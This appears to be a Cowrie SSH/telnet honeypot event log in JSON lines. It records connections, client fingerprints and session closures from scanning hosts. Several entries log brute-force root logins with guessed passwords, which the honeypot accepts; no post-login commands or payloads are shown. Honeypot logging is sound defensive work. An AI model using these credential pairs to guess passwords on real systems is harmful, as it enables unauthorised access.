{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:46:40.563217Z","src_ip":"34.207.152.248","session":"7b7738bfbbfd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62350,"dst_ip":"1.2.3.4","dst_port":22,"session":"449e929abf34","protocol":"ssh","message":"New connection: 217.72.205.35:62350 (1.2.3.4:22) [session: 449e929abf34]","sensor":"my-vps","timestamp":"2025-08-24T16:46:45.541962Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:46:45.543149Z","src_ip":"217.72.205.35","session":"449e929abf34"}
{"eventid":"cowrie.session.connect","src_ip":"183.107.22.70","src_port":45548,"dst_ip":"1.2.3.4","dst_port":23,"session":"80388754ebdc","protocol":"telnet","message":"New connection: 183.107.22.70:45548 (1.2.3.4:23) [session: 80388754ebdc]","sensor":"my-vps","timestamp":"2025-08-24T16:49:23.409434Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":59038,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b438168973a","protocol":"ssh","message":"New connection: 45.88.8.186:59038 (1.2.3.4:22) [session: 8b438168973a]","sensor":"my-vps","timestamp":"2025-08-24T16:49:44.839648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:49:45.272932Z","src_ip":"45.88.8.186","session":"8b438168973a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:49:45.273747Z","src_ip":"45.88.8.186","session":"8b438168973a"}
{"eventid":"cowrie.login.success","username":"root","password":"1234asdf!@#$","message":"login attempt [root/1234asdf!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:49:47.665796Z","src_ip":"45.88.8.186","session":"8b438168973a"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:49:48.255120Z","src_ip":"45.88.8.186","session":"8b438168973a"}
{"eventid":"cowrie.session.closed","duration":30.4611759185791,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:49:53.870530Z","src_ip":"183.107.22.70","session":"80388754ebdc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57028,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ca41b8ff0c8","protocol":"ssh","message":"New connection: 217.72.205.35:57028 (1.2.3.4:22) [session: 2ca41b8ff0c8]","sensor":"my-vps","timestamp":"2025-08-24T16:53:19.814760Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:53:19.816503Z","src_ip":"217.72.205.35","session":"2ca41b8ff0c8"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":43644,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d41e855e6b1","protocol":"ssh","message":"New connection: 45.88.8.215:43644 (1.2.3.4:22) [session: 6d41e855e6b1]","sensor":"my-vps","timestamp":"2025-08-24T16:58:30.388185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:58:31.422509Z","src_ip":"45.88.8.215","session":"6d41e855e6b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:58:31.423230Z","src_ip":"45.88.8.215","session":"6d41e855e6b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Achyut@123","message":"login attempt [root/Achyut@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:58:34.044905Z","src_ip":"45.88.8.215","session":"6d41e855e6b1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:58:34.833962Z","src_ip":"45.88.8.215","session":"6d41e855e6b1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54422,"dst_ip":"1.2.3.4","dst_port":22,"session":"a20e5e8aaaa4","protocol":"ssh","message":"New connection: 217.72.205.35:54422 (1.2.3.4:22) [session: a20e5e8aaaa4]","sensor":"my-vps","timestamp":"2025-08-24T17:00:14.273396Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:00:14.275164Z","src_ip":"217.72.205.35","session":"a20e5e8aaaa4"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.171","src_port":54728,"dst_ip":"1.2.3.4","dst_port":23,"session":"04379fd8858b","protocol":"telnet","message":"New connection: 205.210.31.171:54728 (1.2.3.4:23) [session: 04379fd8858b]","sensor":"my-vps","timestamp":"2025-08-24T17:05:15.995440Z"}
{"eventid":"cowrie.session.closed","duration":31.294505834579468,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:05:47.289846Z","src_ip":"205.210.31.171","session":"04379fd8858b"}
{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":58794,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3735125fca4","protocol":"ssh","message":"New connection: 116.196.70.63:58794 (1.2.3.4:22) [session: e3735125fca4]","sensor":"my-vps","timestamp":"2025-08-24T17:06:31.961400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:06:31.962354Z","src_ip":"116.196.70.63","session":"e3735125fca4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T17:06:32.176193Z","src_ip":"116.196.70.63","session":"e3735125fca4"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:06:39.962272Z","src_ip":"116.196.70.63","session":"e3735125fca4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53028,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cc33a8e4019","protocol":"ssh","message":"New connection: 217.72.205.35:53028 (1.2.3.4:22) [session: 4cc33a8e4019]","sensor":"my-vps","timestamp":"2025-08-24T17:07:02.560973Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:07:02.562559Z","src_ip":"217.72.205.35","session":"4cc33a8e4019"}
{"eventid":"cowrie.session.connect","src_ip":"114.35.197.70","src_port":55850,"dst_ip":"1.2.3.4","dst_port":23,"session":"88e6f2f03afe","protocol":"telnet","message":"New connection: 114.35.197.70:55850 (1.2.3.4:23) [session: 88e6f2f03afe]","sensor":"my-vps","timestamp":"2025-08-24T17:07:33.098458Z"}
{"eventid":"cowrie.session.closed","duration":30.552351474761963,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:08:03.650743Z","src_ip":"114.35.197.70","session":"88e6f2f03afe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52036,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc5bb671d463","protocol":"ssh","message":"New connection: 217.72.205.35:52036 (1.2.3.4:22) [session: dc5bb671d463]","sensor":"my-vps","timestamp":"2025-08-24T17:13:39.068150Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:13:39.069334Z","src_ip":"217.72.205.35","session":"dc5bb671d463"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":46954,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b0a2782d8b","protocol":"ssh","message":"New connection: 45.88.8.186:46954 (1.2.3.4:22) [session: 38b0a2782d8b]","sensor":"my-vps","timestamp":"2025-08-24T17:14:03.016219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:14:03.579822Z","src_ip":"45.88.8.186","session":"38b0a2782d8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T17:14:03.580895Z","src_ip":"45.88.8.186","session":"38b0a2782d8b"}
{"eventid":"cowrie.login.success","username":"root","password":"13969696","message":"login attempt [root/13969696] succeeded","sensor":"my-vps","timestamp":"2025-08-24T17:14:06.113773Z","src_ip":"45.88.8.186","session":"38b0a2782d8b"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:14:07.480959Z","src_ip":"45.88.8.186","session":"38b0a2782d8b"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.34","src_port":60152,"dst_ip":"1.2.3.4","dst_port":22,"session":"87301dc48f43","protocol":"ssh","message":"New connection: 162.142.125.34:60152 (1.2.3.4:22) [session: 87301dc48f43]","sensor":"my-vps","timestamp":"2025-08-24T17:19:38.745643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:19:39.230195Z","src_ip":"162.142.125.34","session":"87301dc48f43"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-24T17:19:39.231927Z","src_ip":"162.142.125.34","session":"87301dc48f43"}
{"eventid":"cowrie.session.closed","duration":"15.6","message":"Connection lost after 15.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:19:54.365196Z","src_ip":"162.142.125.34","session":"87301dc48f43"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49980,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b45630bbe7a","protocol":"ssh","message":"New connection: 217.72.205.35:49980 (1.2.3.4:22) [session: 3b45630bbe7a]","sensor":"my-vps","timestamp":"2025-08-24T17:20:27.958452Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:20:27.959716Z","src_ip":"217.72.205.35","session":"3b45630bbe7a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":47120,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3df1059e1a6","protocol":"ssh","message":"New connection: 45.88.8.215:47120 (1.2.3.4:22) [session: f3df1059e1a6]","sensor":"my-vps","timestamp":"2025-08-24T17:24:18.583473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:24:18.989554Z","src_ip":"45.88.8.215","session":"f3df1059e1a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T17:24:18.990291Z","src_ip":"45.88.8.215","session":"f3df1059e1a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Adhik@123","message":"login attempt [root/Adhik@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T17:24:21.422582Z","src_ip":"45.88.8.215","session":"f3df1059e1a6"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:24:22.108214Z","src_ip":"45.88.8.215","session":"f3df1059e1a6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54556,"dst_ip":"1.2.3.4","dst_port":22,"session":"65843078f672","protocol":"ssh","message":"New connection: 217.72.205.35:54556 (1.2.3.4:22) [session: 65843078f672]","sensor":"my-vps","timestamp":"2025-08-24T17:27:00.239523Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:27:00.240685Z","src_ip":"217.72.205.35","session":"65843078f672"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.156.172","src_port":18614,"dst_ip":"1.2.3.4","dst_port":23,"session":"63b1120d5325","protocol":"telnet","message":"New connection: 64.62.156.172:18614 (1.2.3.4:23) [session: 63b1120d5325]","sensor":"my-vps","timestamp":"2025-08-24T17:28:07.437130Z"}
{"eventid":"cowrie.session.closed","duration":1.8549211025238037,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:28:09.291995Z","src_ip":"64.62.156.172","session":"63b1120d5325"}
{"eventid":"cowrie.session.connect","src_ip":"118.40.122.9","src_port":42417,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3fccaaf409d","protocol":"telnet","message":"New connection: 118.40.122.9:42417 (1.2.3.4:23) [session: e3fccaaf409d]","sensor":"my-vps","timestamp":"2025-08-24T17:32:20.779966Z"}
{"eventid":"cowrie.session.closed","duration":12.404993295669556,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:32:33.184890Z","src_ip":"118.40.122.9","session":"e3fccaaf409d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51852,"dst_ip":"1.2.3.4","dst_port":22,"session":"93888bf2b81c","protocol":"ssh","message":"New connection: 217.72.205.35:51852 (1.2.3.4:22) [session: 93888bf2b81c]","sensor":"my-vps","timestamp":"2025-08-24T17:33:39.472367Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:33:39.473790Z","src_ip":"217.72.205.35","session":"93888bf2b81c"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":52844,"dst_ip":"1.2.3.4","dst_port":22,"session":"08ac35cd555b","protocol":"ssh","message":"New connection: 45.88.8.186:52844 (1.2.3.4:22) [session: 08ac35cd555b]","sensor":"my-vps","timestamp":"2025-08-24T17:38:30.683994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:38:31.151037Z","src_ip":"45.88.8.186","session":"08ac35cd555b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T17:38:31.151794Z","src_ip":"45.88.8.186","session":"08ac35cd555b"}
{"eventid":"cowrie.login.success","username":"root","password":"hms@123","message":"login attempt [root/hms@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T17:38:32.884028Z","src_ip":"45.88.8.186","session":"08ac35cd555b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:38:33.481481Z","src_ip":"45.88.8.186","session":"08ac35cd555b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62168,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e565b992a81","protocol":"ssh","message":"New connection: 217.72.205.35:62168 (1.2.3.4:22) [session: 7e565b992a81]","sensor":"my-vps","timestamp":"2025-08-24T17:40:20.586953Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:40:20.588057Z","src_ip":"217.72.205.35","session":"7e565b992a81"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60276,"dst_ip":"1.2.3.4","dst_port":22,"session":"116b106644cd","protocol":"ssh","message":"New connection: 217.72.205.35:60276 (1.2.3.4:22) [session: 116b106644cd]","sensor":"my-vps","timestamp":"2025-08-24T17:47:08.372942Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:47:08.374178Z","src_ip":"217.72.205.35","session":"116b106644cd"}
